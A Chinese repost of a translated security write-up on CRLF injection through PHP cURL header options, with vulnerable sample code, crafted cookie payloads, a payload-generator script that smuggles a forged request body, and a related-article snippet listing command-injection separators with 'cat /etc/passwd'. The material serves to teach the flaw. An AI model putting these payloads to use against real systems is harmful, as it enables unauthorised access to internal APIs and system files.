curl post json_将CRLF注入PHP的cURL选项

最新推荐文章于 2024-02-26 02:01:55 发布
最新推荐文章于 2024-02-26 02:01:55 发布
阅读量92 收藏
点赞数
文章标签: curl post json curl post请求 curl命令发送post请求 php curl带json

1f586eb587ec6189dd08bb5f188ec46b.png

将CRLF注入PHP的cURL选项

翻译文章,原文:CRLF Injection Into PHP’s cURL Options

0a32e6de7866fa7f6fe20713ef786b2d.png

这是一篇有关将回车符和换行符注入内部API调用的文章。我一年前在Gist on GitHub上写这篇文章,但它并不是真正的博客文章最佳平台,不是吗?我在此处添加了更多详细信息,因此不仅仅是直接复制和粘贴。

我喜欢在可能的时候做白盒测试。我并不是一个出色的黑盒测试者,但是我花了十多年的时间读写PHP程序,在此过程中我犯了很多错误,所以我知道要寻找什么。

预览代码,碰到了类似如下功能:

<?php
// common.php

function getTrialGroups(){
    $trialGroups = 'default';

    if (isset($_COOKIE['trialGroups'])){
        $trialGroups = $_COOKIE['trialGroups'];
    }

    return explode(",", $trialGroups);
}

我正看的这个系统中有个一个'Trial Group'的概念。每个用户会话都有一组与之关联的组,并以逗号分隔的列表形式存储在Cookie中。这个想法是,当启动新功能时,可以首先让一小部分客户启用它们,以降低功能发布的风险,或者允许比较功能上的不同变体(一种称为A/B测试的方法)。 getTrialGroups()函数仅读取cookie值,分割列表(上面的逗号分隔的数据), 然后返回给用户一个试用功能的数组。

此功能中缺少白名单功能立即引起了我的注意。我对其余的代码库进行查找,以找到调用该函数的位置,这样我就可以查看其返回值是否存在任何不安全的用法。

<?php
// server.php

// Include common functions
require __DIR__.'/common.php';

// Using the awesome httpbin.org here to just reflect
// our whole request back at us as JSON :)
$ch = curl_init("http://httpbin.org/post");

// Make curl_exec return the response body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Set the content type and pass through any trial groups
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Content-Type: application/json",
    "X-Trial-Groups: " . implode(",", getTrialGroups())
]);

// Call the 'getPublicData' RPC method on the internal API
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
    "method" => "getPublicData",
    "params" => []
]));

// Return the response to the user
echo curl_exec($ch);

curl_close($ch);

这段代码使用cURL库在内部JSON API上调用了getPublicData方法。该API需要了解用户的试用组(上面提到的试用功能列表),以便可以相应地更改其行为,因此这些试用组将通过X-Trial-Groups(自定义的Http Header)头传递给API。

这里的问题是,在设置CURLOPT_HTTPHEADER时,不检查回车符或换行符。由于getTrialGroups()函数返回用户可控制的数据,因此可以向API请求中插入任意标头。

示例

为了使操作更容易理解,我将使用PHP的内置网络服务器在本地运行server.php:

tom@slim:~/tmp/crlf▶ php -S localhost:1234 server.php
PHP 7.2.7-0ubuntu0.18.04.2 Development Server started at Sun Jul 29 14:15:14 2018
Listening on http://localhost:1234
Document root is /home/tom/tmp/crlf
Press Ctrl-C to quit.

使用cURL命令行程序,我们可以发送一个示例,其中包括一个trialGroups cookie:

tom@slim:~▶ curl -s localhost:1234 -b 'trialGroups=A1,B2'

返回值:

{
  "args": {}, 
  "data": "{"method":"getPublicData","params":[]}", 
  "files": {}, 
  "form": {}, 
  "headers": {
    "Accept": "*/*", 
    "Connection": "close", 
    "Content-Length": "38", 
    "Content-Type": "application/json", 
    "Host": "httpbin.org", 
    "X-Trial-Groups": "A1,B2"
  },
  "json": {
    "method": "getPublicData", 
    "params": []
  }, 
  "origin": "X.X.X.X", 
  "url": "http://httpbin.org/post"
}

我使用的是http://httpbin.org/post,而不是内部API,它返回一个JSON文档,该文档描述了已发送的POST请求,包括请求中的所有POST数据和标头。

关于响应的重要注意事项是,发送到http://httpbin.org的X-Trial-Groups标头包含在trialGroups cookie中的A1,B2字符串。让我们尝试一些有CRLF(回车换行)注入的数据:

tom@slim:~▶ curl -s localhost:1234 -b 'trialGroups=A1,B2%0d%0aX-Injected:%20true'

返回值:

{
  "args": {}, 
  "data": "{"method":"getPublicData","params":[]}", 
  "files": {}, 
  "form": {}, 
  "headers": {
    "Accept": "*/*", 
    "Connection": "close", 
    "Content-Length": "38", 
    "Content-Type": "application/json", 
    "Host": "httpbin.org", 
    "X-Injected": "true", 
    "X-Trial-Groups": "A1,B2"
  }, 
  "json": {
    "method": "getPublicData", 
    "params": []
  }, 
  "origin": "X.X.X.X", 
  "url": "http://httpbin.org/post"
}

PHP会自动将Cookie值中的URL编码序列(例如%0d%0a)解码,因此我们可以在发送的Cookie值中使用URL编码的回车符(%0d)和换行符(%0a)。 HTTP标头由CRLF序列分隔,因此,当PHP cURL库写入请求标头时,X-Injected:有效载荷的真实部分被视为独立标头。

HTTP请求

通过将标头注入请求中,您真正能做什么?说实话,这个例子中能做的不是很多。如果我们对HTTP请求的结构进行更深入的研究,您会发现我们不仅可以注入标头,还可以做更多的事情;我们也可以注入POST数据!

要了解漏洞利用的工作方式,您需要对HTTP请求有所了解。您可以执行的最基本的HTTP POST请求如下所示:

POST /post HTTP/1.1
Host: httpbin.org
Connection: close
Content-Length: 7
thedata

我们逐行分析.

POST /post HTTP/1.1

第一行说,使用HTTP版本1.1,使用POST方法将请求发送到/post端点

Host: httpbin.org

此标头告诉远程服务器,我们正在http://httpbin.org上请求一个页面。这似乎是多余的,但是当您连接到HTTP服务器时,您是在连接服务器的IP地址,而不是域名。如果您的请求中未包含Host标头,则服务器将无法知道您在浏览器的地址栏中键入的域名。

Connection: close

此标头要求服务器在完成发送响应后关闭基础TCP连接。如果没有此标头,则发送响应后,连接可能保持打开状态。

Content-Length: 7

Content-Length标头告诉服务器在请求正文中将发送多少字节的数据。这一点很重要.

这里没有错误;空行只包含CRLF序列。它告诉服务器我们已经完成了发送头,并且请求正文即将发送。(每个Http请求的数据和请求头都需要一个空行来分割,这个是Http协议中规定的内容)。

thedata

最后,我们发送请求正文(又称为POST数据)。它的长度(以字节为单位)必须与我们之前发送的Content-Length标头匹配,因为我们告诉服务器它将必须读取那么多字节。

让我们通过将echo命令传递到netcat来将此请求发送到http://httpbin.org:

tom@slim:~▶ echo -e "POST /post HTTP/1.1rnHost: httpbin.orgrnConnection: closernContent-Length: 7rnrnthedata" | nc httpbin.org 80
HTTP/1.1 200 OK
Connection: close
Server: gunicorn/19.9.0
Date: Sun, 29 Jul 2018 14:16:34 GMT
Content-Type: application/json
Content-Length: 257
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Via: 1.1 vegur

返回值:

{
  "args": {}, 
  "data": "thedata", 
  "files": {}, 
  "form": {}, 
  "headers": {
    "Connection": "close", 
    "Content-Length": "7", 
    "Host": "httpbin.org"
  }, 
  "json": null, 
  "origin": "X.X.X.X", 
  "url": "http://httpbin.org/post"
}

一切正常。我们得到一些响应头,一个CRLF序列,然后是响应主体。

因此,诀窍出在这里:如果发送的POST数据比Content-Length标头中所说明的要多,该怎么办?试试看:

tom@slim:~▶ echo -e "POST /post HTTP/1.1rnHost: httpbin.orgrnConnection: closernContent-Length: 7rnrnthedata some more data" | nc httpbin.org 80
HTTP/1.1 200 OK
Connection: close
Server: gunicorn/19.9.0
Date: Sun, 29 Jul 2018 14:20:10 GMT
Content-Type: application/json
Content-Length: 257
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Via: 1.1 vegur

返回值:

{
  "args": {}, 
  "data": "thedata", 
  "files": {}, 
  "form": {}, 
  "headers": {
    "Connection": "close", 
    "Content-Length": "7", 
    "Host": "httpbin.org"
  }, 
  "json": null, 
  "origin": "X.X.X.X", 
  "url": "http://httpbin.org/post"
}

我们保持Content-Length标头不变,并说我们将发送7个字节,并向请求正文中添加了更多数据,但服务器仅读取了前7个字节。这就是我们可以用来实际利用漏洞的技巧。

利用程序

事实证明,当您设置CURLOPT_HTTPHEADER选项时,不仅可以使用单个CRLF序列注入http请求头,还可以使用双CRLF序列注入POST数据。我们实验如下:

  • 在我们自己的JSON POST数据后,该数据调用getPublicData之外的其他方法;假设getPrivateData
  • 获取该数据的长度(以字节为单位)
  • 使用单个CRLF序列,注入Content-Length标头,指示服务器仅读取该字节数
  • 注入两个CRLF序列,然后注入我们的恶意JSON作为POST数据

如果一切顺利,内部API应该完全忽略合法的JSON POST数据,以支持我们的恶意JSON。

为了使事情变得容易,我倾向于编写一些小的脚本来生成这类有效payload。它减少了我犯错的机会,使我的大脑陷入困境,试图弄清为什么它不起作用。这是我写的:

tom@slim:~▶ cat gencookie.php
<?php
$postData = '{"method": "getPrivateData", "params": []}';
$length = strlen($postData);
$payload = "ignorernContent-Length: {$length}rnrn{$postData}";
echo "trialGroups=".urlencode($payload);
tom@slim:~▶ php gencookie.php 
trialGroups=ignore%0D%0AContent-Length%3A+42%0D%0A%0D%0A%7B%22method%22%3A+%22getPrivateData%22%2C+%22params%22%3A+%5B%5D%7D

尝试:

tom@slim:~▶ curl -s localhost:1234 -b $(php gencookie.php)

返回值:

{
  "args": {}, 
  "data": "{"method": "getPrivateData", "params": []}", 
  "files": {}, 
  "form": {}, 
  "headers": {
    "Accept": "*/*", 
    "Connection": "close", 
    "Content-Length": "42", 
    "Content-Type": "application/json", 
    "Host": "httpbin.org", 
    "X-Trial-Groups": "ignore"
  }, 
  "json": {
    "method": "getPrivateData", 
    "params": []
  }, 
  "origin": "X.X.X.X", 
  "url": "http://httpbin.org/post"
}

成功!我们将x-Trial-Groups标头设置为ignore,注入Content-Length标头和我们自己的POST数据。合法的POST数据仍然被发送,但是服务器完全忽略了它。

这是您不太可能在黑盒测试时发现的错误,但我认为仍然值得一提,因为这些天使用的开源代码太多了,对编写代码的人有很好的启发。

其他攻击

自发现此错误以来,我一直努力注意类似情况。在我的研究中,我发现CURLOPT_HTTPHEADER并不是唯一容易受到相同攻击的cURL选项。以下选项(可能还有其他选项)在请求中隐式设置标头,并且容易受到攻击:

  • CURLOPT_HEADER
  • CURLOPT_COOKIE
  • CURLOPT_RANGE
  • CURLOPT_REFERER
  • CURLOPT_USERAGENT
  • CURLOPT_PROXYHEADER
weixin_39884492
关注
PHP基于curl模拟post提交json数据示例
10-18
主要介绍了PHP基于curl模拟post提交json数据操作,结合实例形式分析了php使用curl实现post方式提交json数据相关操作步骤与注意事项,代码简单实用,需要的朋友可以参考下
PHP POST提交JSON
CodersXu的博客
07-28 1646
PHP POST提交JSON
PHP使用curl方法post发送json数据
IceFlame的博客
02-16 3763
PHP使用curl方法post发送json数据
php如何传递json参数,php处理post传递json格式参数请求
weixin_36431814的博客
03-17 2350
跟外界产品合作对接API的时候,很多时候要求post方式传递json格式的数据。下面简单讲讲处理方式。传递json格式数据的时候,需要注意:1.指定请求后header里面的Content-type的值为application/json。2.传递的值名为body,对应的值需要为json格式。使用Postman演示使用php代码演示说明:本实例依赖composer Guzzle扩展composer ...
PHP通过post数据获取json数据并解析节点数据
qq7712409的专栏
04-09 1570
PHP通过post数据获取json数据并解析节点数据,随笔记录一下,有用的大家可以收藏。
php post请求头设置json,php post请求json数据
weixin_33881426的博客
03-09 2692
博主最近遇到一个新的项目,通过远程接口调用数据。虽然很简单,但还是分享给大家。远程接口的程序是用其他语言,所以程序在传参是需要转成JSON数据。代码如下:$url='https://res.xiuliao.me/***';//接口请求地址$post_data=array("Uid"=>"2221323","Phone"=>"221312312");//post请求数据...
linux shell中curl 发送post请求json格式问题的处理方法
09-15
本文将详细讨论如何在Linux shell中使用`curl`发送JSON格式数据的POST请求,并解决可能遇到的问题。 首先,`curl`是一个强大的命令行工具,用于传输数据到或从服务器,支持多种协议,包括HTTP、HTTPS等。在发送...
api.rar_definitionwir_后台curl模拟post 调接口
09-21
4. **设置POST数据**:如果需要传递数据,可以使用`curl_setopt()`设置POST字段。 ```php $data = array('key1' => 'value1', 'key2' => 'value2'); // 示例数据 curl_setopt($ch, CURLOPT_POSTFIELDS, ...
解析PHP 使用curl提交json格式数据
10-27
CURLOPT_RETURNTRANSFER设置为true是为了让curl_exec()函数执行后返回结果而不是直接输出,这样我们就可以将API返回的数据存储在$result变量中,以便后续处理。而CURLOPT_HTTPHEADER选项用于设置HTTP头部信息,这里...
PHPCURL发送Content-type为application/jsonPOST请求方法
高性价比服务器就选:蓝易云
02-26 997
函数将其转换为JSON格式。然后,我们初始化了一个cURL会话,并设置了一些选项,包括POST请求方法、要发送的数据、返回结果和HTTP头部信息。最后,我们执行了cURL请求并关闭了会话。在PHP中,我们可以使用cURL库来发送Content-type为application/jsonPOST请求。在这段代码中,我们首先创建了一个包含我们要发送的数据的数组,并使用
phpPOST请求json形式
weixin_46011182的博客
12-16 973
public function index() { $post_data = array( 'appkey' => '******', 'current' => 1, 'pageSize' => 10, 'searchDate'=>'2020-12-16' ); echo $this->curls('http://域名/tic.
php post json请求参数传递_php获取json类型的post请求参数
weixin_29589357的博客
03-09 2996
如果你曾因为后端拿不到请求参数而抓狂,那不如先补充以下基础知识吧:故事还是从头说起吧。form表单的enctype属性有3个值form.PNG如果是传统的form表单提交:默认情况下是enctype是application/x-www-form-urlencoded,这个时候php用$_POST["参数名"]轻松拿到参数。如果因为某种原因(比如上传文件)设置enctype为multipart/fo...
命令注入
heiseweiye的博客
10-27 5241
命令注入 命令截断 无回显 过滤与绕过 命令注入-命令截断 system(“ls $dir”); $dir=/tmp; cat /etc/passwd ;(分号将前面的命令隔断,开始一个新的命令) |(将前面的输出,当做一个管道文件传给后一个命令) &amp;amp;(把前面的一个命令放到后台执行,再执行下一个命令) %0a(可以认为输入前面的一个命令之后敲了一个回车,然后又输入了下一个命令) ``...
PHP file_get_contents()发送POST请求(application/json格式)
Tjohn9的博客
04-23 1460
经验证,代码有效。,把注释了就好了。
php接收postjson请求,【PHP】接口接收 json 格式 POST 请求
weixin_39983993的博客
03-10 3092
POST 请求数据不再仅限于表单,而采用 json 形式提交时,提交的内容形式就可以变得多样起来,也更加的方便。如果希望将数组或对象作为 POST 请求的数据一次性提交时,采用传统的表单提交难以实现,但使用 json 形式提交就可以解决这个问题,并且这种方式是很好的选择。file_get_contents() 函数定义和用法定义file_get_contents() 把整个文件读入一个字符串中...
php post json请求参数传递_PHP使用Http Post请求发送Json对象数据代码解析
weixin_39740419的博客
03-09 269
因项目的需要,PHP调用第三方 Java/.Net 写好的 Restful Api,其中有些接口,需要 在发送 POST 请求时,传入对象。Http中传输对象,最好的表现形式莫过于JSON字符串了,但是作为参数的接收方,又是需要被告知传过来的是JSON!其实这不难,只需要发送一个 http Content-Type头信息即可,即 “Content-Type: application/json; c...
php接口注入方式,PHP使用CURL方式POST数据至API接口的方法
weixin_33511258的博客
03-17 230
大部分的API的HTTP请求方式都为GET,所以不管用AJAX和PHP二次处理都能拿到返回的数据但是一些API的HTTP请求方式是POST,那么我们就需要使用curl了其实,也比较简单,上代码:$url = 'http://127.0.0.1/test.php';//POST指向的链接$data = array('access_token'=>'thekeyvalue');$json_da...
php curl json post请求_php post请求发送json对象数据参数
weixin_39928461的博客
03-08 1942
网页中发送请求时,大部分情况都参数以键值组合发送数据的,而一些第三方如java开发的接口中需要发送post请求请求参数json类型。既然要发送json数据,首页我们需要在请求头中定义数据类型为json,告诉服务器客服端发送过来的数据类型为json,设置请求头内容类型:Content-Type: application/json; charset=utf-8php发送post请求json参数代...
php curl post json
最新发布
08-25
curl_setopt($ch, CURLOPT_POST, true); ``` 3. 设置POST数据,这里以JSON格式传递: ```php $data = json_encode(['key' => 'value']); // JSON数据 curl_setopt($ch, CURLOPT_POSTFIELDS, $data); ``` 4. 设置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值